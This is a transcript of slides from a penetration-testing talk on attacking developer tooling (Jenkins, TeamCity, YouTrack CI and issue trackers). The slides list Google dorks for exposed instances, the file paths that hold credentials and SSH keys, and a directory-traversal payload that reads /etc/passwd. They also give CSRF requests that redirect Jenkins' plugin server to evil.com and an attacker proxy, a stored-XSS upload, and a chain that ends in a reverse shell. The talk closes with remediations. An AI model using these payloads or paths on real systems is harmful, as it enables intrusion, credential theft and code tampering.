Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Simple bugs to pwn the devs

264 views

Published on

Pentesting the Development ecosystem

Published in: Software
  • Be the first to comment

  • Be the first to like this

Simple bugs to pwn the devs

  1. 1. @plastunovaa @osakaaa About me Andrey Plastunov Pentester at [DSEC.RU]
  2. 2. Agenda •Intro to Dev ecosystem •Why to attack? •Breaking in: Listing the targets •Breaking in: Attack scenarios •Useful Tools •Remediations (short)
  3. 3. Developer ecosystem
  4. 4. IDEs CI system VCS Issue treacker Deployments erver Developer ecosystem
  5. 5. 1. Directly affects Source codes of your product 2. Works with developer's identity 3. Can provide a great help for attacker during network infiltration Why to attack?
  6. 6. ➢ The source code itself Can be stolen Can be modified (infected) Why to attack?
  7. 7. Goodies: Source code Real life example from some red team Why to attack? ➢ what do they have? 1 Target copmany 1 unawared software vendor
  8. 8. Real life example from some red team ➢ What do they want? Get access to Target's network Why to attack?
  9. 9. Real life example from some red team ➢ But... ● Access the Developers VCS ● Download the sources ● Parse sources for hardoced values ● Find passwords from admin’s endpoint ● Acces the endpoint and upload a shell Why to attack?
  10. 10. ➢ The source code itself Can be stolen Can be modified (infected) ➢ Your identity (== signing key) Signing malicious code with your keys ➢ Elevation of privilege Credentials (Domain, ssh, etc) Code execution (== backend access) Why to attack?
  11. 11. Breaking in
  12. 12. Breaking in Sources Identity Network creds Backend + + + - + + - - + + +++ + +- - + - Actually, not in scope =)
  13. 13. IDEs CI system VCS Issue treacker Deployments erver Breaking in
  14. 14. IDEs VCS Issue treacker Deployments erver Breaking in CI system Source code access Signing key access Access rights on all other components That is our target
  15. 15. Goodies: Source code CI System A note on CI: basic scheme Plugins UI Master Slave
  16. 16. Goodies: Source code • Jenkins • No authentication enabled by default • No roles at all - Unauth • Teamcity • Registration enabled by default (Often, with “Project developer” role) • Guest login enabled by default - Guest - Open reg A note on CI: Access level problems Google dork: intitle:“Dashboard [Jenkins]” intext:” Manage Jenkins” Google dork: intitle: “Projects - TeamCity” Google dork: intitle: “Register a New user Account - TeamCity”
  17. 17. Goodies: Source code • Weak protection against CSRF attacks (truth for default or outdated instances) • A great number of vulnerabilities in the CI itself (and also in all that default plugins) A note on CI: UI Problems
  18. 18. Goodies: Source code • Weak protection against CSRF attacks (truth for default or outdated instances) • A great number of XSS vulnerabilities in the CI itself (and also in all that default plugins) A note on CI: UI Problems
  19. 19. Goodies: Source code • Weak protection against CSRF attacks (truth for default or outdated instances) • A great number of XSS vulnerabilities in the CI itself (and also in all that default plugins) A note on CI: UI Problems _
  20. 20. Goodies: Source code • Weak protection against CSRF attacks (truth for default or outdated instances) • A great number of XSS vulnerabilities in the CI itself (and also in all that default plugins) A note on CI: UI Problems _
  21. 21. Goodies: Source code • Any project can access (and modify) files of other projects on the same Agent - Jenkins agent working dir - TeamCity agent working dir • If Agent == Master: Any project can access (and modify) CI configuration itself - Jenkins configuration dir - TeamCity configuration dir A note on CI: isolation problems ../workspace/ ../../work/ (buildAgent/work/) $JENKINS_HOME/ .BuildServer/config/
  22. 22. Goodies: Source codeBreaking in: CI (if we have access to it. And we almost certainly have!) Project administrator role Create Project Build Project Access to Build Server’s OS
  23. 23. •Client side vulnerabilities Breaking in: CI (if we have access to it. And we almost certainly have!) Project administrator role
  24. 24. •Client side vulnerabilities Breaking in: CI (if we have access to it. And we almost certainly have!) Project administrator role Setup XSS payload Plant XSS payload PWN! Examples can be found here*: https://goo.gl/YUqHbk Flaws in Jenkins: https://goo.gl/XJZcBk For flaws in TeamCity you can see the release notes: https://goo.gl/pEcjJm …Phish a little...
  25. 25. • Build Agent’s Misuse (Agent == Master case) Breaking in: CI (if we have local network access. Teamcity case) Project administrator role
  26. 26. Breaking in: CI (if we have local network access. Teamcity case) Function: <Censored until Security update> Payload example: #logs/../../../../../../.. /etc/passwd TeamCity Agent Directory Traversal in XML-RPC API
  27. 27. • Build Agent’s Misuse (Agent == Master case) Hint1: Default Build Agent == Master Server Hint2: Master stores its super admin password in: Hint3: by default agent listens on 0.0.0.0 Hint4: Agent's default listening port is 9090 Breaking in: CI (if we have local network access. Teamcity case) Project administrator role Send a crafted XML-RPC payload to Agent* Perform MitM attack on agent and Master We gain super administrator role ./logs/teamcity-server.log
  28. 28. • Build Agent’s Misuse (Agent == Master case) Hint1: Default Build Agent == Master Server Hint2: Master stores its super admin password in file ./logs/teamcity-server. log Hint3: by default agent listens on 0.0.0.0 Hint4: Agent's default listening port is 9090 Breaking in: CI (if we have local network access. Teamcity case) Project administrator role Send a crafted XML-RPC payload to Agent* Perform MitM attack on agent and Master We gain super administrator role
  29. 29. Breaking in: CI Useful path for credential gathering Project administrator role •Jenkins • Build logs
  30. 30. Useful path for credential gathering Breaking in: CI (if we have local network access. Teamcity case) Project administrator role •Jenkins • Build logs
  31. 31. Useful path for credential gatheringProject administrator role •Jenkins • Build logs • Passwords: ./jobs/<project_name>/config.xml • Project’s keystore: ./workspace/<project_name>/<keystore_name>/ (often but not always) •TeamCity • Internal HSQLDB: .BuildServer/system/buildserver.data • Project’s VCS config: .BuildServer/config/projects/<project name>/vcsRoots • Project’s ssh keys: .BuildServer/config/projects/<project name>/ssh_keys Breaking in: CI Useful path for credential gathering
  32. 32. •Plugins misuse Breaking in: CI (if we have access to it. And we almost certainly have!) Project administrator role
  33. 33. •Plugins misuse (Jenkins case) Breaking in: CI (if we have access to it. And we almost certainly have!) Project administrator role •Modify configuration VIA CSRF (or XSS) Setting up evil plugin server via CSRF vulnerability: /pluginManager/siteConfigure?site=http%3A%2F%2Fwww.evil.com&. crumb=&json=%7B%22site%22%3A+%22http%3A%2F%2Fwww.evil.com%22% 2C+%22crumb%22%3A+%22%22%7D&Submit=%D0%A1%D0%BE%D1%85%D1% 80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C
  34. 34. •Plugins misuse (Jenkins case) Breaking in: CI (if we have access to it. And we almost certainly have!) Project administrator role •Modify configuration VIA CSRF (or XSS) Setting up evil host as proxy for plugin server via CSRF vulnerability : /pluginManager/proxyConfigure?_.name=192.168.1.26&_.port=54321&_.userName=&_. password=&_.noProxyHost=&_.testUrl=http%3A%2F%2Fwww.ya.ru&.crumb=&json=%7B% 22name%22%3A+%22192.168.1.26%22%2C+%22port%22%3A+%2254321%22%2C+% 22userName%22%3A+%22%22%2C+%22password%22%3A+%22%22%2C+%22noProxyHost% 22%3A+%22%22%2C+%22testUrl%22%3A+%22http%3A%2F%2Fwww.ya.ru%22%2C+% 22crumb%22%3A+%22%22%7D&Submit=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD% D0%B8%D1%82%D1%8C
  35. 35. •Plugins misuse (Jenkins Case) Breaking in: CI (if we have access to it. And we almost certainly have!) Project administrator role Setup Malicious plugin server Exploit Client-Side vulnerability PWN VIA UI + plugin description For Jenkins you could use: Juseppe (https://goo.gl/fiLZc9) cvcvcv
  36. 36. •Plugins misuse (Jenkins Case) Breaking in: CI (if we have access to it. And we almost certainly have!) Project administrator role Setup Malicious plugin server Exploit Client-Side vulnerability PWN VIA UI + plugin description For Jenkins you could use: Juseppe (https://goo.gl/fiLZc9) cvcvcv PWN VIA Plugin itself cvcvcv
  37. 37. Goodies: Source codeBreaking in: issue tracking (if we do no have access to CI) Administrative privileges Access to credentials storage Extracting CI credentials Access to CI
  38. 38. •Client side vulnerabilities Breaking in: issue tracking (if we do no have access to CI) Administrative privileges
  39. 39. Breaking in: issue tracking (if we do no have access to CI) YouTrack stored XSS Function: Upload attachment to Issue Payload example: Content-type:application/xml <?xml version="1.0" encoding="UTF-8"?> <Query> <SearchTerm> <script xmlns="http://www.w3.org/1999/xhtml"> alert('Hello'); </script> </SearchTerm> </Query>
  40. 40. •Server side vulnerabilities Breaking in: issue tracking (if we do no have access to CI) Access to credentials storage
  41. 41. Breaking in: issue tracking (if we do no have access to CI) YouTrack Directory Traversal Prerequisite: Set backup dir to any value you want on target OS (Admin privs required) Function: admin/databaseBackup + backupFile Payload example: /backupFile/passwd
  42. 42. Goodies: Source codeBreaking in: issue tracking (if we do no have access to CI) Client side vulnerability (e.g. XSS) Based on Youtrack’s capabilities Administrative privileges Server side vulnerability (e.g. Directory Traversal) Tracker’s OS accessCI credential access For Youtrack various configuration properties (including credentials) could be found at: ~/teamsysdata/youtrack/00000000000.xd
  43. 43. Breaking in: All together Short summary of the video: 1. Upload XSS with a payload to download youtrack credentials to our host 2. Exploit the XSS against administrator 3. Parse the file on our host and find teamcity record 4. Use the teamcity credentials to upload shell on teamcity - I created a small tool to perform the task. It will be available on my github 5. Get the reverse shell to your host ... 6. Profit
  44. 44. Goodies: Source code • Exploiting TeamCity account Creation (if it is disabled at first look) https: //beyondbinary.io/articles/teamcity-account-creation • Retrieving the ecryption key via admin script console in Jenkins: http://www. th3r3p0.com/vulns/jenkins/jenkinsVuln.html • What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability. https://goo.gl/K6CiIE • Serialization Must Die: Act 2: XStream https://goo.gl/9c68jD • My github (in a couple of weeks ^_^): https://github.com/osakaaa/CI_tools Useful tips and tools:
  45. 45. Remediations. Summary ➢ Never rely on default settings ➢ Never bind to 0.0.0.0 ➢ Never rely on safety of 3rd party components like plugins ➢ Update your tools as soon as a new security advisory is published ➢ Perform additional validation on all user inputs (including sources) ➢ Try to isolate projects (Docker?)
  46. 46. The END???

×